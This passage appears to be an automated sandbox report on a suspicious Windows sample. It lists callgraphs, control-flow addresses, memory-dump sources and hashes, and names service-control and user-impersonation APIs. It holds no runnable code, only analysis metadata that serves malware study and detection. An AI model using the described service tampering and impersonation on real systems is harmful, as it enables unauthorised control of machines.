                                                                                                                                                                                                                                            Signature Coverage:28.6%
                                                                                                                                                                                                                                            Total number of Nodes:21
                                                                                                                                                                                                                                            Total number of Limit Nodes:0

                                                                                                                                                                                                                                            Callgraph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            • Opacity -> Relevance
                                                                                                                                                                                                                                            • Disassembly available
                                                                                                                                                                                                                                            callgraph 0 Function_00007FFBACE60710 30 Function_00007FFBACE60138 0->30 1 Function_00007FFBACE60E52 2 Function_00007FFBACE60C91 10 Function_00007FFBACE60E02 2->10 3 Function_00007FFBACE60ED1 26 Function_00007FFBACE6102C 3->26 4 Function_00007FFBACE6100C 5 Function_00007FFBACE60A0E 6 Function_00007FFBACE601D8 6->6 7 Function_00007FFBACE60198 6->7 15 Function_00007FFBACE601C8 6->15 31 Function_00007FFBACE601B8 6->31 40 Function_00007FFBACE601E8 6->40 41 Function_00007FFBACE601A8 6->41 8 Function_00007FFBACE60158 9 Function_00007FFBACE60118 11 Function_00007FFBACE60A7E 11->8 11->9 14 Function_00007FFBACE60148 11->14 42 Function_00007FFBACE60168 11->42 12 Function_00007FFBACE6077D 13 Function_00007FFBACE61188 13->0 13->9 16 Function_00007FFBACE60108 13->16 43 Function_00007FFBACE60128 13->43 15->6 15->7 15->15 15->31 15->40 15->41 17 Function_00007FFBACE60188 18 Function_00007FFBACE607CA 27 Function_00007FFBACE60A2E 18->27 19 Function_00007FFBACE6108A 20 Function_00007FFBACE6190A 20->8 20->9 20->14 20->17 32 Function_00007FFBACE60178 20->32 21 Function_00007FFBACE6214A 33 Function_00007FFBACE6223A 21->33 22 Function_00007FFBACE6000A 23 Function_00007FFBACE606CA 24 Function_00007FFBACE62049 25 Function_00007FFBACE60031 28 Function_00007FFBACE606ED 28->30 29 Function_00007FFBACE60B2D 31->6 31->7 31->15 31->31 31->40 31->41 34 Function_00007FFBACE60C34 35 Function_00007FFBACE62273 36 Function_00007FFBACE61262 36->9 36->16 36->43 37 Function_00007FFBACE60DE2 38 Function_00007FFBACE61B61 38->24 39 Function_00007FFBACE61A1D 40->6 40->7 40->15 40->31 40->40 40->41 44 Function_00007FFBACE62029

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 55 7ffbace61b61-7ffbace61bd8 58 7ffbace61bda-7ffbace61be9 55->58 59 7ffbace61c36-7ffbace61c68 55->59 58->59 60 7ffbace61beb-7ffbace61bee 58->60 66 7ffbace61cc7-7ffbace61d00 59->66 67 7ffbace61c6a-7ffbace61c7a 59->67 62 7ffbace61bf0-7ffbace61c03 60->62 63 7ffbace61c28-7ffbace61c30 60->63 64 7ffbace61c07-7ffbace61c1a 62->64 65 7ffbace61c05 62->65 63->59 64->64 68 7ffbace61c1c-7ffbace61c24 64->68 65->64 73 7ffbace61d02-7ffbace61d11 66->73 74 7ffbace61d5e-7ffbace61d97 66->74 67->66 69 7ffbace61c7c-7ffbace61c7f 67->69 68->63 71 7ffbace61c81-7ffbace61c94 69->71 72 7ffbace61cb9-7ffbace61cc1 69->72 75 7ffbace61c98-7ffbace61cab 71->75 76 7ffbace61c96 71->76 72->66 73->74 77 7ffbace61d13-7ffbace61d16 73->77 84 7ffbace61d99-7ffbace61da9 74->84 85 7ffbace61df6-7ffbace61e2f 74->85 75->75 78 7ffbace61cad-7ffbace61cb5 75->78 76->75 79 7ffbace61d50-7ffbace61d58 77->79 80 7ffbace61d18-7ffbace61d2b 77->80 78->72 79->74 82 7ffbace61d2f-7ffbace61d42 80->82 83 7ffbace61d2d 80->83 82->82 86 7ffbace61d44-7ffbace61d4c 82->86 83->82 84->85 87 7ffbace61dab-7ffbace61dae 84->87 91 7ffbace61e31-7ffbace61e41 85->91 92 7ffbace61e8e-7ffbace61ec7 85->92 86->79 89 7ffbace61db0-7ffbace61dc3 87->89 90 7ffbace61de8-7ffbace61df0 87->90 93 7ffbace61dc7-7ffbace61dda 89->93 94 7ffbace61dc5 89->94 90->85 91->92 96 7ffbace61e43-7ffbace61e46 91->96 102 7ffbace61ec9-7ffbace61ed9 92->102 103 7ffbace61f26-7ffbace61fe2 ChangeServiceConfigA 92->103 93->93 95 7ffbace61ddc-7ffbace61de4 93->95 94->93 95->90 97 7ffbace61e80-7ffbace61e88 96->97 98 7ffbace61e48-7ffbace61e5b 96->98 97->92 100 7ffbace61e5f-7ffbace61e72 98->100 101 7ffbace61e5d 98->101 100->100 105 7ffbace61e74-7ffbace61e7c 100->105 101->100 102->103 104 7ffbace61edb-7ffbace61ede 102->104 111 7ffbace61fea-7ffbace61ffc call 7ffbace62049 103->111 112 7ffbace61fe4 103->112 106 7ffbace61ee0-7ffbace61ef3 104->106 107 7ffbace61f18-7ffbace61f20 104->107 105->97 109 7ffbace61ef7-7ffbace61f0a 106->109 110 7ffbace61ef5 106->110 107->103 109->109 113 7ffbace61f0c-7ffbace61f14 109->113 110->109 115 7ffbace62001-7ffbace62026 111->115 112->111 113->107
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.267444090.00007FFBACE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACE60000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ffbace60000_ijx54ck.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ChangeConfigService
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3849694230-0
                                                                                                                                                                                                                                            • Opcode ID: 5318751bf963e1d4199becdbd6dd24e3568dc0c4fb841f20e99168a92f8dbc81
                                                                                                                                                                                                                                            • Instruction ID: 753a3dda2ac0f793f9253f0e74da2763967724792ae9f50a311b0c0a372a4016
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5318751bf963e1d4199becdbd6dd24e3568dc0c4fb841f20e99168a92f8dbc81
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 58E1A270928A4D4FEB69DF28C84A7F977D1FB58311F10426EEC4EC7291DA74E5818B82
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.267444090.00007FFBACE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACE60000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ffbace60000_ijx54ck.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: NameUser
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2645101109-0
                                                                                                                                                                                                                                            • Opcode ID: 1f727483ad23d7027779cac7456524fa9e5ecb4bcc76f74043dedc125c17914b
                                                                                                                                                                                                                                            • Instruction ID: 8d847a8b7f30e3acf091a6bb1f7a5e26825eb9459d351bd36d59c5f609c9fe11
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1f727483ad23d7027779cac7456524fa9e5ecb4bcc76f74043dedc125c17914b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 34714D70618A4D8FEB69EF28C8597E977E1FF58300F00416AD84EC7291CF78A981CB81
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.267444090.00007FFBACE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACE60000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ffbace60000_ijx54ck.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ImpersonateLoggedUser
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2216092060-0
                                                                                                                                                                                                                                            • Opcode ID: 8c09ce61d7ec36d0d9d03e54c8871c725b0108171a32be438fbf08df39025fe7
                                                                                                                                                                                                                                            • Instruction ID: 149197b2c04e7c3165959a2c9f0441de5c0e251541f30d95450568b3fc477372
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8c09ce61d7ec36d0d9d03e54c8871c725b0108171a32be438fbf08df39025fe7
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 80A1237191DB884FDB5ADB78D8596F97BE0EF56321F0401BFD089D32A3CA28A806C751
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 147 7ffbace61a1d-7ffbace61a25 148 7ffbace61a28-7ffbace61ad9 ControlService 147->148 149 7ffbace61a27 147->149 153 7ffbace61ae1-7ffbace61b17 148->153 154 7ffbace61adb 148->154 149->148 155 7ffbace61b22-7ffbace61b5e 153->155 156 7ffbace61b19-7ffbace61b21 153->156 154->153 156->155
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.267444090.00007FFBACE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACE60000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ffbace60000_ijx54ck.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ControlService
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 253159669-0
                                                                                                                                                                                                                                            • Opcode ID: 849ca4ac4a8af9ca13f720632db8c9186dc8e42fad4fbc3eec2d57f471c03ba7
                                                                                                                                                                                                                                            • Instruction ID: be256e1a0ac44f8203a3c423667eb60ce82c09630f4c129bc5ca387313b67adb
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 849ca4ac4a8af9ca13f720632db8c9186dc8e42fad4fbc3eec2d57f471c03ba7
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2F41177191CB484FDB19DB68DC0AAF97FE4EF56321F04416EE089D3152DA74A809CB92
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 158 7ffbace60c91-7ffbace60ce5 161 7ffbace60d40-7ffbace60daa OpenServiceA 158->161 162 7ffbace60ce7-7ffbace60cf6 158->162 169 7ffbace60db2-7ffbace60ddf call 7ffbace60e02 161->169 170 7ffbace60dac 161->170 162->161 163 7ffbace60cf8-7ffbace60cfb 162->163 164 7ffbace60cfd-7ffbace60d10 163->164 165 7ffbace60d35-7ffbace60d3d 163->165 167 7ffbace60d12 164->167 168 7ffbace60d14-7ffbace60d27 164->168 165->161 167->168 168->168 171 7ffbace60d29-7ffbace60d31 168->171 170->169 171->165
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.267444090.00007FFBACE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACE60000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ffbace60000_ijx54ck.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: OpenService
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3098006287-0
                                                                                                                                                                                                                                            • Opcode ID: f4a0ac8b6eac7513a3bd9e2177e78c95315754add0a1e579646cd2bb5a7af802
                                                                                                                                                                                                                                            • Instruction ID: 7a6bc57de15006f44a5765a15a05cc1e72175f49d566f575d399bf7bbd101295
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f4a0ac8b6eac7513a3bd9e2177e78c95315754add0a1e579646cd2bb5a7af802
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 57411070514A4D8FEB98EF28C8597A977E1FB68315F10426EE84ED3291DF74E8818B81
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 174 7ffbace60b2d-7ffbace60bb8 179 7ffbace60bc2-7ffbace60bc7 174->179 180 7ffbace60bba-7ffbace60bbf 174->180 181 7ffbace60bd1-7ffbace60c08 OpenSCManagerW 179->181 182 7ffbace60bc9-7ffbace60bce 179->182 180->179 183 7ffbace60c10-7ffbace60c2d 181->183 184 7ffbace60c0a 181->184 182->181 184->183
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.267444090.00007FFBACE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACE60000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ffbace60000_ijx54ck.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ManagerOpen
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1889721586-0
                                                                                                                                                                                                                                            • Opcode ID: 1046615745fc46ce21984d668589953389008509efde110b541aa55438508a0e
                                                                                                                                                                                                                                            • Instruction ID: ca7b04ba514ff7c6d560962731711a04763f64d2711aaa129b1efeeab8813324
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1046615745fc46ce21984d668589953389008509efde110b541aa55438508a0e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E331A07191CB588FDB29DFA8D8496F9BBE0EB65321F04816FD04AD3252DB70A845CB81
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 185 7ffbace6108a-7ffbace610b3 186 7ffbace610be-7ffbace61152 FindCloseChangeNotification 185->186 187 7ffbace610b5-7ffbace610bd 185->187 191 7ffbace6115a-7ffbace61181 186->191 192 7ffbace61154 186->192 187->186 192->191
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.267444090.00007FFBACE60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACE60000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ffbace60000_ijx54ck.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2591292051-0
                                                                                                                                                                                                                                            • Opcode ID: e2d01c9e65a6419a8dc77552adaf4d690868c3205e01f38761249302d704f5e8
                                                                                                                                                                                                                                            • Instruction ID: 21fd76bb176ade59fca86a80285275b84de0dd72d4d63b4d72a70042a51137a8
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e2d01c9e65a6419a8dc77552adaf4d690868c3205e01f38761249302d704f5e8
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5131267090C78C8FDB0ADB68C8197E97FF0EF56320F04029FD089D31A2DA65A856CB91
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.328837323.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_2790000_kxL91dA.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 461d5e18da8d9510772ad0267d78681eed26ab470ddde9acddbd8b191234e239
                                                                                                                                                                                                                                            • Instruction ID: be797ff1c690e1b1010d4781df48de84ed22ca8d8590329bc87eac36d317cd33
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 461d5e18da8d9510772ad0267d78681eed26ab470ddde9acddbd8b191234e239
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C2226A347002158FDB14DB78D4A4A6E7BE6EF89314F2584A9E906CB3A2DF35DC06CB91
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • INDvU25uCG9krA24ZlOgemaUSnFuCmWjY6tadV54ZPzKf7PEjK86OHz3yvEveeq5KoJrIFEbyWUsVjzznHnqanLOlZbXembgdu6i0nWzoZNLeYSTY2wDo4wjffKO1eWKcr, xrefs: 02792CAD
                                                                                                                                                                                                                                            • 8c_j, xrefs: 02792C95
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.328837323.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_2790000_kxL91dA.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: 8c_j$INDvU25uCG9krA24ZlOgemaUSnFuCmWjY6tadV54ZPzKf7PEjK86OHz3yvEveeq5KoJrIFEbyWUsVjzznHnqanLOlZbXembgdu6i0nWzoZNLeYSTY2wDo4wjffKO1eWKcr
                                                                                                                                                                                                                                            • API String ID: 0-4109359022
                                                                                                                                                                                                                                            • Opcode ID: 8b2272b457eab097f0b20fd9c2959d32ef9746ee1481ec3b2321f65ec21d0782
                                                                                                                                                                                                                                            • Instruction ID: fc8d7bd6ed9d5978aba76fdb01af4ca048420c4a8b536a2c3ee13fcef0be534e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8b2272b457eab097f0b20fd9c2959d32ef9746ee1481ec3b2321f65ec21d0782
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 27713A30D01308DFCB05EFB8E8648ADBBB6FF8A316B608569E415A7395DF359849CB11
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • INDvU25uCG9krA24ZlOgemaUSnFuCmWjY6tadV54ZPzKf7PEjK86OHz3yvEveeq5KoJrIFEbyWUsVjzznHnqanLOlZbXembgdu6i0nWzoZNLeYSTY2wDo4wjffKO1eWKcr, xrefs: 02792CAD
                                                                                                                                                                                                                                            • 8c_j, xrefs: 02792C95
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.328837323.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_2790000_kxL91dA.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: 8c_j$INDvU25uCG9krA24ZlOgemaUSnFuCmWjY6tadV54ZPzKf7PEjK86OHz3yvEveeq5KoJrIFEbyWUsVjzznHnqanLOlZbXembgdu6i0nWzoZNLeYSTY2wDo4wjffKO1eWKcr
                                                                                                                                                                                                                                            • API String ID: 0-4109359022
                                                                                                                                                                                                                                            • Opcode ID: ee9400008ef3f300b335c1c37c1bca6a50f3e61f1da559d34f3b227b74c89fa4
                                                                                                                                                                                                                                            • Instruction ID: 0f07a35f63dc61c69126f764ec475e60ee0c9592a398f79519bde081cc9e3f69
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ee9400008ef3f300b335c1c37c1bca6a50f3e61f1da559d34f3b227b74c89fa4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8C61F530D01308DFCB04EFB8E8588ADBBB6FF8A316B609669E41667394DF359845CB15
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • INDvU25uCG9krA24ZlOgemaUSnFuCmWjY6tadV54ZPzKf7PEjK86OHz3yvEveeq5KoJrIFEbyWUsVjzznHnqanLOlZbXembgdu6i0nWzoZNLeYSTY2wDo4wjffKO1eWKcr, xrefs: 02792CAD
                                                                                                                                                                                                                                            • 8c_j, xrefs: 02792C95
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.328837323.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_2790000_kxL91dA.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: 8c_j$INDvU25uCG9krA24ZlOgemaUSnFuCmWjY6tadV54ZPzKf7PEjK86OHz3yvEveeq5KoJrIFEbyWUsVjzznHnqanLOlZbXembgdu6i0nWzoZNLeYSTY2wDo4wjffKO1eWKcr
                                                                                                                                                                                                                                            • API String ID: 0-4109359022
                                                                                                                                                                                                                                            • Opcode ID: 4694eae61cf039c7646c25bc3cf3098fb9e5812b8dda463bde64a03a8ee5c1ed
                                                                                                                                                                                                                                            • Instruction ID: b88157c75ac05fe5f2c6983ea7494a6ed7e13b9ff15374770733723a91b4256c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4694eae61cf039c7646c25bc3cf3098fb9e5812b8dda463bde64a03a8ee5c1ed
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 06511630901308DFCB04EFB8E8688ADBBB6FF8A316B60856DE41667394DF359845CB11
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.328837323.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_2790000_kxL91dA.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 9400116a1688e41b6d8f1e31c17838b901734e1c33c873dd28cf7bea8a962680
                                                                                                                                                                                                                                            • Instruction ID: 240ea43ed31bee14c94611151060fa69e33a1637c9de0bf03511738878cb05a3
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9400116a1688e41b6d8f1e31c17838b901734e1c33c873dd28cf7bea8a962680
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B113FC78911204EFCB16AB60E950D9DB332FF99306B5084BEDC1137BA9CA3B9952DF11
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.328837323.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_2790000_kxL91dA.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: e016d6d4c00c118d92da873c1cb6a1d18ca33bf0112654883f5d12ada6fe175b
                                                                                                                                                                                                                                            • Instruction ID: 7ca4c3790aaba8f4307833e10a27e605e3436b3252921c6a143e735a7bda583b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e016d6d4c00c118d92da873c1cb6a1d18ca33bf0112654883f5d12ada6fe175b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5013EC78911204EFCB16AB60E950D9DB332FF99306B5084BEDC1137BA9CA3B9952DF11
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.328837323.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_2790000_kxL91dA.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: 8q
                                                                                                                                                                                                                                            • API String ID: 0-596622023
                                                                                                                                                                                                                                            • Opcode ID: 473e3eb1c35ada377053ace46c985fe041a2f64df2ccafa2aa1ae67e991229fa
                                                                                                                                                                                                                                            • Instruction ID: 5cb7c00f64116d2972930974420d0f3c773b36e7485ed6a2a8373ac35c0b781c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 473e3eb1c35ada377053ace46c985fe041a2f64df2ccafa2aa1ae67e991229fa
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0CE14E34A00209DFDB55DF69E894A6EBBB2FF88310F148569E4169B3A1DB31EC45CF50
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.328837323.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_2790000_kxL91dA.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: 8q
                                                                                                                                                                                                                                            • API String ID: 0-596622023
                                                                                                                                                                                                                                            • Opcode ID: e7f2f5c70f1abad63d13921635a9b7af04a6e01d4bb5ae422bee9289dd6cdfaa
                                                                                                                                                                                                                                            • Instruction ID: 425baa796507c78e9b396154ce0651ca445e96d195c2910a74e4a6de10b4de35
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e7f2f5c70f1abad63d13921635a9b7af04a6e01d4bb5ae422bee9289dd6cdfaa
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DE913174A00209DFDB55DF64E498AAEBBF2FF88310B148559E8159B361DB30EC46CF94
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.328837323.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_2790000_kxL91dA.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: 8q
                                                                                                                                                                                                                                            • API String ID: 0-596622023
                                                                                                                                                                                                                                            • Opcode ID: aecf27825cbf776395ccc873376cf6a43344d41e424a46737696cd5c4ca0ba8e
                                                                                                                                                                                                                                            • Instruction ID: 5c160760218caf73cc425c4aca3a8339e79afece350812d7a612f43c3964a12b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aecf27825cbf776395ccc873376cf6a43344d41e424a46737696cd5c4ca0ba8e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 62714A74E003098FDB14DFA9D4546AEBBF2BF89304F248529D805AB394DB709D46CB91
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.328837323.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_2790000_kxL91dA.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: 8c_j
